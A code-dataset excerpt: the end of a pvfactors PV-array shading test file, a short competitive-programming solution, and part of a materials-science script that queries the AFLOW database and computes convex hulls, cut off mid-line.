ordered_pvarray.pvrows[1]\n list_pvsegments = center_row.front.list_segments\n fully_shaded_segment = list_pvsegments[-1]\n partial_shaded_segment = list_pvsegments[-2]\n assert fully_shaded_segment.illum_collection.is_empty\n np.testing.assert_almost_equal(\n fully_shaded_segment.shaded_collection.length,\n list_pvsegments[0].length)\n assert partial_shaded_segment.shaded_collection.length > 0\n assert partial_shaded_segment.illum_collection.length > 0\n sum_lengths = (partial_shaded_segment.illum_collection.length +\n partial_shaded_segment.shaded_collection.length)\n np.testing.assert_almost_equal(sum_lengths, list_pvsegments[0].length)\n\n\ndef test_ordered_pvarray_gnd_pvrow_shadow_casting_back_n_seg(\n params_direct_shading):\n\n params_direct_shading.update({'cut': {1: {'back': 7}},\n 'solar_azimuth': 270,\n 'surface_tilt': 120})\n # Test front shading on right\n ordered_pvarray = OrderedPVArray.from_dict(params_direct_shading)\n ordered_pvarray.cast_shadows()\n # Check shadow casting on ground\n assert len(ordered_pvarray.ground.list_segments[0]\n .shaded_collection.list_surfaces) == 1\n assert len(ordered_pvarray.ground.list_segments[0]\n .illum_collection.list_surfaces) == 2\n assert ordered_pvarray.ground.length == MAX_X_GROUND - MIN_X_GROUND\n\n assert ordered_pvarray.illum_side == 'back'\n # Shading length should be identical as in previous test for front surface,\n # but now with back surface\n np.testing.assert_almost_equal(\n ordered_pvarray.pvrows[2].back.shaded_length, 0.33333333333333254)\n np.testing.assert_almost_equal(\n ordered_pvarray.pvrows[1].back.shaded_length, 0.33333333333333254)\n np.testing.assert_almost_equal(\n ordered_pvarray.pvrows[0].back.shaded_length, 0.)\n np.testing.assert_almost_equal(\n ordered_pvarray.pvrows[2].front.shaded_length, 0.)\n np.testing.assert_almost_equal(\n ordered_pvarray.pvrows[1].front.shaded_length, 0.)\n np.testing.assert_almost_equal(\n ordered_pvarray.pvrows[0].front.shaded_length, 0.)\n\n # Test individual segments\n center_row = ordered_pvarray.pvrows[1]\n list_pvsegments = center_row.back.list_segments\n fully_shaded_segment = list_pvsegments[-1]\n partial_shaded_segment = list_pvsegments[-2]\n assert fully_shaded_segment.illum_collection.is_empty\n np.testing.assert_almost_equal(\n fully_shaded_segment.shaded_collection.length,\n list_pvsegments[0].length)\n assert partial_shaded_segment.shaded_collection.length > 0\n assert partial_shaded_segment.illum_collection.length > 0\n sum_lengths = (partial_shaded_segment.illum_collection.length +\n partial_shaded_segment.shaded_collection.length)\n np.testing.assert_almost_equal(sum_lengths, list_pvsegments[0].length)\n\n\ndef test_ordered_pvarray_cuts_for_pvrow_view(ordered_pvarray):\n \"\"\"Test that pvarray ground is cut correctly\"\"\"\n\n ordered_pvarray.cast_shadows()\n n_surfaces_0 = ordered_pvarray.ground.n_surfaces\n len_0 = ordered_pvarray.ground.length\n ordered_pvarray.cuts_for_pvrow_view()\n n_surfaces_1 = ordered_pvarray.ground.n_surfaces\n len_1 = ordered_pvarray.ground.length\n\n assert n_surfaces_1 == n_surfaces_0 + 3\n assert len_1 == len_0\n\n\ndef test_ordered_pvarray_list_surfaces(ordered_pvarray):\n \"\"\"Check that getting a correct list of surfaces\"\"\"\n ordered_pvarray.cast_shadows()\n n_surfaces = ordered_pvarray.n_surfaces\n list_surfaces = ordered_pvarray.all_surfaces\n\n assert isinstance(list_surfaces, list)\n assert len(list_surfaces) == n_surfaces\n assert isinstance(list_surfaces[0], PVSurface)\n\n\ndef test_build_surface_registry(ordered_pvarray):\n \"\"\"Test that building surface registry correctly\"\"\"\n\n ordered_pvarray.cast_shadows()\n reg = ordered_pvarray.surface_registry\n\n assert reg.shape[0] == ordered_pvarray.n_surfaces\n assert reg.shape[1] == len(ordered_pvarray.registry_cols)\n\n\ndef test_get_all_surface_indices(ordered_pvarray):\n\n # Complete array\n ordered_pvarray.cast_shadows()\n ordered_pvarray.cuts_for_pvrow_view()\n\n # Check surface indices before indexing\n surf_indices = ordered_pvarray.surface_indices\n assert surf_indices == [None] * ordered_pvarray.n_surfaces\n\n # Check surface indices after indexing\n ordered_pvarray.index_all_surfaces()\n surf_indices = ordered_pvarray.surface_indices\n np.testing.assert_array_equal(surf_indices,\n range(ordered_pvarray.n_surfaces))\n\n\ndef test_view_matrix_flat(params):\n\n # Make flat\n params.update({'surface_tilt': 0})\n\n # Create pvarray\n pvarray = OrderedPVArray.from_dict(params)\n\n # Create shadows and pvrow cuts\n pvarray.cast_shadows()\n pvarray.cuts_for_pvrow_view()\n\n # Build view matrix\n vm = pvarray.view_matrix\n\n assert vm.shape[0] == pvarray.n_surfaces + 1\n np.testing.assert_array_equal(vm, vm_flat_orderedpvarray)\n\n\ndef test_view_matrix(params):\n\n params.update({'surface_azimuth': 270})\n\n # Create pvarray\n pvarray = OrderedPVArray.from_dict(params)\n\n # Create shadows and pvrow cuts\n pvarray.cast_shadows()\n pvarray.cuts_for_pvrow_view()\n\n # Build view matrix and obstruction matrix\n vm, om = pvarray._build_view_matrix()\n\n assert vm.shape[0] == pvarray.n_surfaces + 1\n np.testing.assert_array_equal(vm, vm_right_orderedpvarray)\n # The view matrix mask should be symmetric\n mask_vm = np.where(vm != 0, 1, 0)\n np.testing.assert_array_equal(mask_vm[:-1, :-1], mask_vm.T[:-1, :-1])\n # Removing sky row and column because didn't fill the last row\n\n # The obstruction matrix should be symmetric\n np.testing.assert_array_equal(om, om.T)\n # TODO: test values against saved array\n\n\ndef test_surface_params(params):\n\n surface_params = ['qinc']\n pvarray = OrderedPVArray.from_dict(params, surface_params=surface_params)\n pvarray.cast_shadows()\n pvarray.cuts_for_pvrow_view()\n\n # Set all surfaces parameters to 1\n pvarray.update_params({'qinc': 1})\n\n # Check that all surfaces of the correct surface params\n all_surfaces = pvarray.all_surfaces\n for surf in all_surfaces:\n assert surf.surface_params == surface_params\n assert surf.get_param('qinc') == 1\n\n # Check weighted values\n np.testing.assert_almost_equal(\n pvarray.ground.get_param_weighted('qinc'), 1)\n np.testing.assert_almost_equal(\n pvarray.ground.get_param_ww('qinc'),\n pvarray.ground.length)\n for pvrow in pvarray.pvrows:\n # Front\n np.testing.assert_almost_equal(\n pvrow.front.get_param_weighted('qinc'), 1)\n np.testing.assert_almost_equal(\n pvrow.front.get_param_ww('qinc'), pvrow.front.length)\n # Back\n np.testing.assert_almost_equal(\n pvrow.back.get_param_weighted('qinc'), 1)\n np.testing.assert_almost_equal(\n pvrow.back.get_param_ww('qinc'), pvrow.back.length)\n\n\ndef test_orderedpvarray_neighbors(params):\n \"\"\"Check that pvrow neighbors are determined correctly\"\"\"\n\n pvarray_right = OrderedPVArray.from_dict(params)\n params.update({'surface_azimuth': 270})\n pvarray_left = OrderedPVArray.from_dict(params)\n\n # Check\n l1 = [None, 0, 1]\n l2 = [1, 2, None]\n np.testing.assert_array_equal(pvarray_right.front_neighbors, l2)\n np.testing.assert_array_equal(pvarray_right.back_neighbors, l1)\n np.testing.assert_array_equal(pvarray_left.front_neighbors, l1)\n np.testing.assert_array_equal(pvarray_left.back_neighbors, l2)\n\n\ndef test_orderedpvarray_almost_flat():\n \"\"\"Making sure that things are correct when the pvarray is almost flat\n and the sun is very low, which means that the shadows on the ground, and\n the edge points will be outside of ground range (since not infinite)\"\"\"\n\n params = {\n 'n_pvrows': 3,\n 'pvrow_height': 2.5,\n 'pvrow_width': 2.,\n 'surface_azimuth': 90., # east oriented modules\n 'axis_azimuth': 0., # axis of rotation towards North\n 'surface_tilt': 0.01, # almost flat\n 'gcr': 0.4,\n 'solar_zenith': 89.9, # sun super low\n 'solar_azimuth': 90., # sun located in the east\n }\n\n pvarray = OrderedPVArray.from_dict(params)\n pvarray.cast_shadows()\n pvarray.cuts_for_pvrow_view()\n view_matrix = pvarray.view_matrix\n\n ground_seg = pvarray.ground.list_segments[0]\n # there should be no visible shadow on the ground\n assert len(ground_seg.shaded_collection.list_surfaces) == 0\n # all of the edge points should be outside of range of ground geometry\n for edge_pt in pvarray.edge_points:\n assert not contains(pvarray.ground.original_linestring, edge_pt)\n\n # Check values of view matrix mask, to make sure that front does not\n # see the ground\n vm_mask = np.where(view_matrix > 0, 1, 0)\n expected_vm_mask = [\n [0, 0, 1, 0, 1, 0, 1, 1], # ground\n [0, 0, 0, 0, 1, 0, 0, 1], # front\n [1, 0, 0, 0, 0, 0, 0, 1], # back\n [0, 0, 0, 0, 0, 0, 1, 1], # front\n [1, 1, 0, 0, 0, 0, 0, 1], # back\n [0, 0, 0, 0, 0, 0, 0, 1], # front\n [1, 0, 0, 1, 0, 0, 0, 1], # back\n [0, 0, 0, 0, 0, 0, 0, 0]]\n np.testing.assert_array_equal(vm_mask, expected_vm_mask)\n\n\ndef test_time_ordered_pvarray(params):\n\n # params.update({'surface_tilt': 0})\n from pvfactors.viewfactors import VFCalculator\n\n import time\n n = 100\n list_elapsed = []\n for _ in range(n):\n tic = time.time()\n pvarray = OrderedPVArray.from_dict(params)\n pvarray.cast_shadows() # time consuming in pvarray creation\n pvarray.cuts_for_pvrow_view()\n pvarray.index_all_surfaces()\n # sr = pvarray.surface_registry\n # vm = pvarray.view_matrix\n vm, om = pvarray._build_view_matrix()\n geom_dict = pvarray.dict_surfaces\n\n calculator = VFCalculator()\n # number 1 time consuming, triples run time\n vf_matrix = calculator.get_vf_matrix(geom_dict, vm, om,\n pvarray.pvrows)\n toc = time.time()\n list_elapsed.append(toc - tic)\n\n print(\"\\nAvg time elapsed: {} s\".format(np.mean(list_elapsed)))\n","sub_path":"pvfactors/tests/test_geometry/test_pvarray.py","file_name":"test_pvarray.py","file_ext":"py","file_size_in_byte":19273,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"227203636","text":"#!/usr/bin/python3\r\n# わ~~~~~からんですわ~~~~~~~\r\nfrom collections import Counter\r\nN = int(input())\r\nA = list(input().split())\r\nfor k in range(N):\r\n ans = 0\r\n A_copy=sorted(A)\r\n A_copy.remove(A[k])\r\n c = Counter(A_copy) #dict\r\n for l in c.keys():\r\n ans+= ( c[l] * (c[l]-1) ) / 2 \r\n print(int(ans))","sub_path":"ABC159/d.py","file_name":"d.py","file_ext":"py","file_size_in_byte":352,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"549720524","text":"import numpy as np\nfrom scipy.optimize import linprog\nfrom numpy.linalg import solve\nfrom fractions import Fraction\nimport traceback\nimport signal\nimport sys\nimport os\nimport shutil\nimport time\nimport json\nimport urllib\nimport requests\nfrom urllib.request import urlopen,Request,urlretrieve\nfrom aflow import *\n\nMM_of_Elements = {'H': 1.00794, 'He': 4.002602, 'Li': 6.941, 'Be': 9.012182, 'B': 10.811, 'C': 12.0107, 'N': 14.0067,\n 'O': 15.9994, 'F': 18.9984032, 'Ne': 20.1797, 'Na': 22.98976928, 'Mg': 24.305, 'Al': 26.9815386,\n 'Si': 28.0855, 'P': 30.973762, 'S': 32.065, 'Cl': 35.453, 'Ar': 39.948, 'K': 39.0983, 'Ca': 40.078,\n 'Sc': 44.955912, 'Ti': 47.867, 'V': 50.9415, 'Cr': 51.9961, 'Mn': 54.938045,\n 'Fe': 55.845, 'Co': 58.933195, 'Ni': 58.6934, 'Cu': 63.546, 'Zn': 65.409, 'Ga': 69.723, 'Ge': 72.64,\n 'As': 74.9216, 'Se': 78.96, 'Br': 79.904, 'Kr': 83.798, 'Rb': 85.4678, 'Sr': 87.62, 'Y': 88.90585,\n 'Zr': 91.224, 'Nb': 92.90638, 'Mo': 95.94, 'Tc': 98.9063, 'Ru': 101.07, 'Rh': 102.9055, 'Pd': 106.42,\n 'Ag': 107.8682, 'Cd': 112.411, 'In': 114.818, 'Sn': 118.71, 'Sb': 121.760, 'Te': 127.6,\n 'I': 126.90447, 'Xe': 131.293, 'Cs': 132.9054519, 'Ba': 137.327, 'La': 138.90547, 'Ce': 140.116,\n 'Pr': 140.90465, 'Nd': 144.242, 'Pm': 146.9151, 'Sm': 150.36, 'Eu': 151.964, 'Gd': 157.25,\n 'Tb': 158.92535, 'Dy': 162.5, 'Ho': 164.93032, 'Er': 167.259, 'Tm': 168.93421, 'Yb': 173.04,\n 'Lu': 174.967, 'Hf': 178.49, 'Ta': 180.9479, 'W': 183.84, 'Re': 186.207, 'Os': 190.23, 'Ir': 192.217,\n 'Pt': 195.084, 'Au': 196.966569, 'Hg': 200.59, 'Tl': 204.3833, 'Pb': 207.2, 'Bi': 208.9804,\n 'Po': 208.9824, 'At': 209.9871, 'Rn': 222.0176, 'Fr': 223.0197, 'Ra': 226.0254, 'Ac': 227.0278,\n 'Th': 232.03806, 'Pa': 231.03588, 'U': 238.02891, 'Np': 237.0482, 'Pu': 244.0642, 'Am': 243.0614,\n 'Cm': 247.0703, 'Bk': 247.0703, 'Cf': 251.0796, 'Es': 252.0829, 'Fm': 257.0951, 'Md': 258.0951,\n 'No': 259.1009, 'Lr': 262, 'Rf': 267, 'Db': 268, 'Sg': 271, 'Bh': 270, 'Hs': 269, 'Mt': 278,\n 'Ds': 281, 'Rg': 281, 'Cn': 285, 'Nh': 284, 'Fl': 289, 'Mc': 289, 'Lv': 292, 'Ts': 294, 'Og': 294,\n 'ZERO': 0}\n\nvaspPot = {\"H\" : \"H\" ,\n\"He\" : \"He\" ,\n\"Li\" : \"Li_sv\" ,\n\"Be\" : \"Be\" ,\n\"B\" : \"B\" ,\n\"C\" : \"C\" ,\n\"N\" : \"N\" ,\n\"O\" : \"O\" ,\n\"F\" : \"F\" ,\n\"Ne\" : \"Ne\" ,\n\"Na\" : \"Na_pv\" ,\n\"Mg\" : \"Mg\" ,\n\"Al\" : \"Al\" ,\n\"Si\" : \"Si\" ,\n\"P\" : \"P\" ,\n\"S\" : \"S\" ,\n\"Cl\" : \"Cl\" ,\n\"Ar\" : \"Ar\" ,\n\"K\" : \"K_sv\" ,\n\"Ca\" : \"Ca_sv\" ,\n\"Sc\" : \"Sc_sv\" ,\n\"Ti\" : \"Ti_sv\" ,\n\"V\" : \"V_sv\" ,\n\"Cr\" : \"Cr_pv\" ,\n\"Mn\" : \"Mn_pv\" ,\n\"Fe\" : \"Fe\" ,\n\"Co\" : \"Co\" ,\n\"Ni\" : \"Ni\" ,\n\"Cu\" : \"Cu\" ,\n\"Zn\" : \"Zn\" ,\n\"Ga\" : \"Ga_d\" ,\n\"Ge\" : \"Ge_d\" ,\n\"As\" : \"As\" ,\n\"Se\" : \"Se\" ,\n\"Br\" : \"Br\" ,\n\"Kr\" : \"Kr\" ,\n\"Rb\" : \"Rb_sv\" ,\n\"Sr\" : \"Sr_sv\" ,\n\"Y\" : \"Y_sv\" ,\n\"Zr\" : \"Zr_sv\" ,\n\"Nb\" : \"Nb_sv\" ,\n\"Mo\" : \"Mo_pv\" ,\n\"Tc\" : \"Tc_pv\" ,\n\"Ru\" : \"Ru_pv\" ,\n\"Rh\" : \"Rh_pv\" ,\n\"Pd\" : \"Pd\" ,\n\"Ag\" : \"Ag\" ,\n\"Cd\" : \"Cd\" ,\n\"In\" : \"In_d\" ,\n\"Sn\" : \"Sn_d\" ,\n\"Sb\" : \"Sb\" ,\n\"Te\" : \"Te\" ,\n\"I\" : \"I\" ,\n\"Xe\" : \"Xe\" ,\n\"Cs\" : \"Cs_sv\" ,\n\"Ba\" : \"Ba_sv\" ,\n\"La\" : \"La\" ,\n\"Ce\" : \"Ce\" ,\n\"Pr\" : \"Pr_3\" ,\n\"Nd\" : \"Nd_3\" ,\n\"Pm\" : \"Pm_3\" ,\n\"Sm\" : \"Sm_3\" ,\n\"Eu\" : \"Eu_2\" ,\n\"Gd\" : \"Gd_3\" ,\n\"Tb\" : \"Tb_3\" ,\n\"Dy\" : \"Dy_3\" ,\n\"Ho\" : \"Ho_3\" ,\n\"Er\" : \"Er_3\" ,\n\"Tm\" : \"Tm_3\" ,\n\"Yb\" : \"Yb_2\" ,\n\"Lu\" : \"Lu_3\" ,\n\"Hf\" : \"Hf_pv\" ,\n\"Ta\" : \"Ta_pv\" ,\n\"W\" : \"W_pv\" ,\n\"Re\" : \"Re\" ,\n\"Os\" : \"Os\" ,\n\"Ir\" : \"Ir\" ,\n\"Pt\" : \"Pt\" ,\n\"Au\" : \"Au\" ,\n\"Hg\" : \"Hg\" ,\n\"Tl\" : \"Tl_d\" ,\n\"Pb\" : \"Pb_d\" ,\n\"Bi\" : \"Bi_d\" ,\n\"Po\" : \"Po_d\" ,\n\"At\" : \"At_d\" ,\n\"Rn\" : \"Rn\" ,\n\"Fr\" : \"Fr_sv\" ,\n\"Ra\" : \"Ra_sv\" ,\n\"Ac\" : \"Ac\" ,\n\"Th\" : \"Th\" ,\n\"Pa\" : \"Pa\" ,\n\"U\" : \"U\" ,\n\"Np\" : \"Np\" ,\n\"Pu\" : \"Pu\" ,\n\"Am\" : \"Am\" ,\n\"Cm\" : \"Cm\" }\n\ndef aflowPotSet():\n aflowPot = {}\n for i,rec in enumerate(data):\n if not rec.get(\"code\").startswith(\"vasp\") : continue\n if rec.get(\"dft_type\")!=\"PAW_PBE\" : continue\n elp = rec.get(\"species_pp\").split(\",\")\n\n for pot in elp:\n if pot in aflowPot.keys():\n aflowPot[pot] += 1\n else:\n aflowPot[pot] = 1\n for key in vaspPot:\n kk = -1\n for k1 in aflowPot:\n el = k1.split('_')[0]\n if el==key:\n if aflowPot[k1]>kk:\n pot = k1\n kk = aflowPot[k1]\n if kk > 0: vaspPot[key] = pot\n\ndef signal_handler(sig, frame):\n print('You pressed Ctrl+C!')\n sys.exit(0)\n\ndef aflow_missing(entry):\n if os.path.exists(\"aflow_missing.json\") :\n with open(\"aflow_missing.json\", encoding='utf-8') as json_file:\n missing_data = json.load(json_file)\n missing_data.append(str(entry))\n else:\n missing_data = [str(entry)]\n with open('aflow_missing.json', 'w') as outfile:\n json.dump(missing_data, outfile)\n sys.exit(0)\n\n\"\"\"convert decimal number q into fractional\"\"\"\ndef frac(q):\n a = Fraction(q).limit_denominator()\n if (a.denominator >1024):\n return('{:+.5f}*'.format(q))\n else:\n return('{:+.0f}/{:.0f}*'.format(a.numerator, a.denominator))\n\n\"\"\"check if value is a float number\"\"\"\ndef isfloat(value):\n try:\n float(value)\n return True\n except ValueError:\n return False\n\n\"\"\"add 1.0 as summation constrain for the list of number in line\nline - a list of composition\nreturn:\na list lead lead by 1.0 followed by a list of composition\n\"\"\"\ndef bMaker(line):\n b = [1.0]\n b.extend(line)\n b = np.array(list(map(float,b)))\n return (b)\n\n\"\"\"combine phase fraction with phase names\nX - phase composition\nPhases - list of phase name\nreturn:\na string with composition followed by phase name (multiple)\n\"\"\"\ndef getPhase(X,Phases):\n decompose = \" \"\n for x in X:\n if (x[1] == 1.0):\n decompose = Phases[x[0]]\n break\n else:\n decompose = decompose + frac(x[1])+Phases[x[0]]\n return(decompose.replace(\" +\",\"\"))\n\n\n\"\"\"convert a chemical formula into element list and composition\nformula - chemical formula\nreturn:\nelement list and composition list\n\"\"\"\ndef formula2composition(formula):\n formula = formula.replace(\" \",'').replace(\"-\",'').replace(\",\",'')\n newc = \"\"\n \"\"\"Follow the convention, elemental symbol must start from capital letter\"\"\"\n for c in formula:\n if c in \"ABCDEFGHIJKLMNOPQRSTUVWXYZ\":\n newc = newc + '|'\n newc = newc + c\n els = newc.split('|')\n els = [k for k in els if k != '']\n\n \"\"\"now get the composition for each element\"\"\"\n ele = []\n com = []\n for el in els:\n newel = \"\"\n newcc = \"\"\n for c in el:\n if c.isalpha():\n newel = newel + c\n else:\n newcc = newcc + c\n\n if (newel not in periodictable):\n print('\"',newel,'\" is not an element! your formula is wrong!')\n sys.exit(1)\n ele.append(newel)\n\n if (len(newcc)!=0):\n if (isfloat(newcc)):\n com.append(float(newcc))\n else:\n print('\"',newcc,'\" is not a float number! your formula is wrong!')\n sys.exit(1)\n else:\n com.append(1.0)\n com = np.array(list(map(float,com)))\n com = com/sum(com)\n\n #sorted the sequence and merge the duplicate\n elist = sorted(set(ele))\n clist = np.zeros(len(elist), dtype=float)\n for j,el in enumerate(ele):\n ix = elist.index(el)\n clist[ix] += com[j]\n\n return elist,clist\n\n\"\"\"convert a chemical formula into element list and composition\nformula - chemical formula\nreturn:\nelement list and composition list\n\"\"\"\ndef formula2nat(formula):\n formula = formula.replace(\" \",'').replace(\"-\",'').replace(\",\",'')\n newc = \"\"\n \"\"\"Follow the convention, elemental symbol must start from capital letter\"\"\"\n for c in formula:\n if c in \"ABCDEFGHIJKLMNOPQRSTUVWXYZ\":\n newc = newc + '|'\n newc = newc + c\n els = newc.split('|')\n els = [k for k in els if k != '']\n\n \"\"\"now get the composition for each element\"\"\"\n ele = []\n com = []\n for el in els:\n newel = \"\"\n newcc = \"\"\n for c in el:\n if c.isalpha():\n newel = newel + c\n else:\n newcc = newcc + c\n\n if (newel not in periodictable):\n print('\"',newel,'\" is not an element! your formula is wrong!')\n sys.exit(1)\n ele.append(newel)\n\n if (len(newcc)!=0):\n if (isfloat(newcc)):\n com.append(int(newcc))\n else:\n print('\"',newcc,'\" is not a float number! your formula is wrong!')\n sys.exit(1)\n else:\n com.append(1)\n com = np.array(list(map(int,com)))\n\n #sorted the sequence and merge the duplicate\n elist = sorted(set(ele))\n clist = np.zeros(len(elist), dtype=int)\n for j,el in enumerate(ele):\n ix = elist.index(el)\n clist[ix] += com[j]\n\n return elist,clist\n\ndef prety_formula(_els,_nat):\n els = sorted(set(_els))\n nat = np.zeros(len(els),dtype=int)\n for i,el in enumerate(_els):\n ix = els.index(el)\n nat[ix] += _nat[i]\n\n Nd = min(nat)\n for i in range(Nd,0,-1):\n out = True\n for j in range(len(nat)):\n if ((nat[j]//i)*i!=nat[j]):\n out = False\n break\n if out:\n break\n form = \"\"\n for j,el in enumerate(els):\n ix = nat[j]//i\n form = form+el\n if ix!=1:\n form = form+str(ix)\n return form\n\ndef downloads(filters):\n #http://aflowlib.duke.edu/search/API/?species((Hf,Pt),Rh),$nspecies(3),energy_atom,$paging(0)\n #{\"compound\":\"Hf1Pt1Rh2\",\"auid\":\"aflow:bb46bd634476e7fb\",\"aurl\":\"aflowlib.duke.edu:AFLOWDATA/LIB3_RAW/Hf_pvPtRh_pv/TBCC015.CAB\",\"species\":\"Hf,Pt,Rh\"}\n # ).orderby(K.energy_atom)\n sys.stdout.write('\\nScreening {} ... '.format(filters))\n result = search(batch_size=9999\n ).filter(filters\n ).filter((K.code % 'vasp')\n ).select(K.energy_atom, K.species, K.composition, K.compound, K.code, K.dft_type, K.volume_atom, K.Pearson_symbol_relax, K.prototype, K.sg2, K.spacegroup_relax, K.species_pp)\n return processresult(result)\n\ndef processresult(result):\n global allrec, nentries, totaltime, startime, missing_data\n allcompds = {}\n try:\n sys.stdout.write('{}+{} entries returned.\\n'.format(nentries,len(result)))\n nentries += len(result)\n except:\n sys.stdout.write('{}+{} entries returned.\\n'.format(nentries,0))\n return allcompds\n\n for entry in result:\n if str(entry) in missing_data: \n print(str(entry), \"not FOUND!\")\n continue\n try:\n if not all(elem in runPot for elem in entry.species_pp) : continue\n composition = entry.composition\n compound = prety_formula(entry.species,composition)\n if compound in allcompds.keys():\n energy_atom = entry.energy_atom\n if float(energy_atom) >= float(allcompds.get(compound)[0]) : continue\n \"\"\"\n ret = requests.head(str(entry))\n if ret.status_code >= 400 : continue #error in AFLOW, link not exist\n \"\"\"\n\n _dft_type = entry.dft_type[0].strip()\n if _dft_type!=dft_type : continue\n # prec = [entry.compound,entry.code,entry.dft_type,entry.enthalpy_formation_atom,entry.natoms,entry.nspecies,entry.Pearson_symbol_orig,entry.prototype,entry.sg,entry.spacegroup_orig,entry.species,entry.species_pp,entry.stoichiometry,entry.energy_atom,entry.volume_atom]\n arec = [entry.energy_atom, entry, entry.species, composition, entry.compound, entry.code, _dft_type, entry.volume_atom, entry.Pearson_symbol_relax, entry.prototype, entry.sg2, entry.spacegroup_relax, entry.auid]\n prec = {compound:arec}\n #print(prec)\n allcompds.update(prec)\n except:\n traceback.print_exc()\n pass\n sys.stdout.write ('{} + {} Secs. '.format(round(totaltime,3), round(time.time()-startime -totaltime,3)))\n totaltime = time.time()-startime\n if len(allcompds) != 0:\n sys.stdout.write('{}+{} compounds accumulated\\n'.format(len(allrec),len(allcompds)))\n return allcompds\n \n\ndef outelement(els):\n if containoperator==\"$all\":\n if all(elem in els for elem in contain) : return True\n else : return False\n elif containoperator==\"$in\":\n for el in els:\n if el in contain: return True\n return False\n else:\n return True\n\n\n\"\"\"make the convex hull and find the stability of all phases\ndstack - data stack contain all information, such as phasename, energy, elements, etc\nreturn:\n\"\"\"\ndef convexhull(_dstack,fastcode=False):\n Elements = []\n Phases = []\n Gstack = []\n dstack = []\n for ff in _dstack:\n els = ff[\"elements\"].split(' ')\n els = [k for k in els if k != '']\n els = sorted(sorted(set(els)))\n for el in els:\n if el not in Elements:\n Elements.append(el)\n if len(els)==1:\n if els[0] in suspend:\n continue\n dstack.append(ff)\n Phases.append(ff[\"phasename\"])\n Gstack.append(ff[\"energy\"])\n\n Elements = sorted(set(Elements))\n print('\\n\\n#Elemental components:', Elements)\n\n amatrix = []\n Amatrix = []\n refG = np.zeros(len(Elements), dtype=float)\n\n \"\"\"Make the A matrix for simplex algebra\"\"\"\n for ff in dstack:\n tComponents = ff[\"elements\"].split(' ')\n tComponents = [k for k in tComponents if k != '']\n tnComponents = np.array(list(map(float,ff[\"composition\"])))\n Components = sorted(set(tComponents))\n nComponents = np.zeros(len(Components))\n for i0,el in enumerate(tComponents):\n ix = Components.index(el)\n nComponents[ix] = nComponents[ix] + tnComponents[i0]\n nComponents /= nComponents.sum()\n\n aaa = []\n Amatrix.append(1.0)\n for i,element in enumerate(Elements):\n if element in Components:\n j = Components.index(element)\n aaa.append(nComponents[j])\n Amatrix.append(nComponents[j])\n else:\n aaa.append(0.0)\n Amatrix.append(0.0)\n\n amatrix.append(aaa)\n for m,el in enumerate(Elements):\n if (float(aaa[m]) == 1.0):\n refG[m] = min(refG[m], float(ff[\"energy\"]))\n\n row= len(Phases)\n col= len(Elements)\n \n Gstack = np.array(list(map(float,Gstack)))\n Amatrix = np.array(list(map(float,Amatrix))).reshape(row,col+1)\n Amatrix=Amatrix.T\n\n if fastcode:\n fastGstack, fastPhases, fastAmatrix = fast_preparing(amatrix, Elements, Gstack, Phases, Amatrix)\n\n ndata = 0\n hstack = []\n for j,line in enumerate(amatrix):\n \"\"\"using simplex to find if is a stable phase\"\"\" \n comp = np.array(list(map(float,line)))\n if fastcode:\n \"\"\"optimizing code by remove redunt conditions\"\"\"\n res = fast_linprog(fastGstack, fastAmatrix, comp)\n x = [[i,q] for i,q in enumerate(res.x) if (q>1.e-8)]\n hull = getPhase(x,fastPhases)\n else:\n \"\"\"use normal minimization\"\"\"\n b = bMaker(comp)\n res = linprog(Gstack, Amatrix, b, bounds=(0.0, 1.0),method='Simplex')\n x = [[i,q] for i,q in enumerate(res.x) if (q>1.e-8)]\n hull = getPhase(x,Phases)\n\n \"\"\"deltaF is the formation energy\"\"\"\n deltaF = (float(Gstack[j]) - sum(comp*refG))\n dstack[j][\"formation_energy\"] = deltaF\n #print(sum(res.x*res.x))\n #print(dstack[j])\n #if (abs(sum(res.x*res.x)-1.0) < 1.e-3) and abs(res.fun-Gstack[j])=\")\n if line[0].endswith(\"Pearson_symbol_relax\") : Pearson_symbol = line[1]\n elif line[0].endswith(\"prototype\") : prototype = line[1]\n elif line[0].endswith(\"sg2\") : sg2 = line[1].split(\" \")[0]\n elif line[0].endswith(\"spacegroup_relax\") : spacegroup = int(line[1])\n elif line[0].endswith(\"energy_cutoff\") : energy_cutoff = line[1]\n elif line[0].endswith(\"species_pp\") : species_pp = line[1]\n spname = ff[\"phasename\"]+'+'+sg2.replace('{','').replace('}','').replace('/','').replace('_','')+'+'+prototype+'+'+str(spacegroup)+'+'+ff[\"afid\"]\n \n for ii,bline in enumerate(records) :\n aline = bline.decode(\"utf-8\").strip()\n line = aline.split(\"
=\")\n \n if len(kpoints)!=0 and not kpo:\n for kpoint in kpoints:\n try:\n aline.index(kpoint+'')\n kpo = True\n except:\n pass\n if kpo:\n urllib.request.urlretrieve(entry+'/'+kpoint, posdir + spname + \".KPOINTS\")\n break\n\n if len(contcars)!=0 and not con:\n for contcar in contcars:\n try:\n aline.index(contcar+'')\n con = True\n except:\n pass\n if con:\n poscarfile = posdir + spname + \".VASP\"\n urllib.request.urlretrieve(entry+'/'+contcar, poscarfile)\n alines = open(poscarfile, 'r').readlines()\n alines.insert(5,\" \"+ff[\"elements\"]+'\\n')\n N = 8+sum(ff[\"composition\"])\n open(poscarfile, 'w').writelines(alines[:N])\n kustoutfiles(poscarfile)\n break\n\n open(posdir + spname + \".POTCAR\", 'w').write(str(species_pp)+'\\n')\n open(posdir + spname + \".ENCUT\", 'w').write(str(energy_cutoff)+'\\n')\n if ff[\"hull_energy\"]<=ehullthr:\n sys.stdout.write(\"{:<16s} {:<16s} {:3d} {:12s} {:7s} {:<22s}\".format(ff[\"phasename\"], ff[\"pretty_formula\"], spacegroup, sg2, Pearson_symbol, prototype))\n else:\n sys.stdout.write(\"{:>16s} {:>16s} {:3d} {:12s} {:7s} {:<22s}\".format(ff[\"phasename\"], ff[\"pretty_formula\"], spacegroup, sg2, Pearson_symbol, prototype))\n return poscarfile\n \n\n\"\"\"attempt to speed up the speed. I am not sure if I will continue on it\"\"\"\ndef fast_preparing(amatrix, Elements, Gstack, Phases, Amatrix):\n comPhases = [getPhCom(Elements,l) for l in amatrix]\n g = []\n ccg = []\n nx = []\n for j,gg in enumerate(Gstack):\n cc = comPhases[j]\n if cc in ccg:\n ix = ccg.index(cc)\n if gg1.e-8)]\n\n prettycom = \"\"\n print(\"\\nBy atomic percentages, the phases are:\\n\")\n for x in X:\n #phases = Phases[x[0]].split(\"#\")\n phases = 